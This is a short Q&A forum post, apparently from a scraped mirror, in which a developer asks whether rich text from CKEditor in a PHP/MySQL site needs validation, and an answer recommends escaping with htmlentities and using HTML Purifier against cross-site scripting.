Rich text and parameterized queries, should I be worried?
For this particular project I will be using PHP 5.3 & MySQL with parameterized queries and CKE Editor.
A little background on what my situation is:
The users on the site don't interact with each other.
All the users have private conversations with me only (confidential information), which contain richtext.
I've limited the CKE editor to limit the user to basic html, bold, images and miscellaneous formatting.
Now, two things:
1.)Do I still need some form of validation? If a user tries to input html or php or any other code in the rich text form, could it have any possible effect on my site? Or will it just be outp开发者_开发问答utted as simple text once it's echo'd from the database?
2.)Is there anything else I should be worried about?
I haven't started on the project yet so I'm asking this to be prepared when I get to the user input part.
What do you recommend I do in my situation?
1.)Do I still need some form of validation? If a user tries to input html or php or any other code in the rich text form, could it have any possible effect on my site? Or will it just be outputted as simple text once it's echo'd from the database?
Definitely you should, there are a number of ways to bypass those ways using unicde, hex and more formats.
2.)Is there anything else I should be worried about?
You should be worried about Cross-Site Scripting (XSS). You need to use htmlentities
function at the minimum.
echo htmlentities($text, ENT_QUOTES, "UTF-8");
Possible Solution:
You can use HTML Purifier:
HTML Purifier is a standards-compliant HTML filter library written in PHP. HTML Purifier will not only remove all malicious code (better known as XSS) with a thoroughly audited,
secure yet permissive whitelist, it will also make sure your documents are standards compliant, something only achievable with a comprehensive knowledge of W3C's specifications.
Useful Resources:
- PHP Security Guide
精彩评论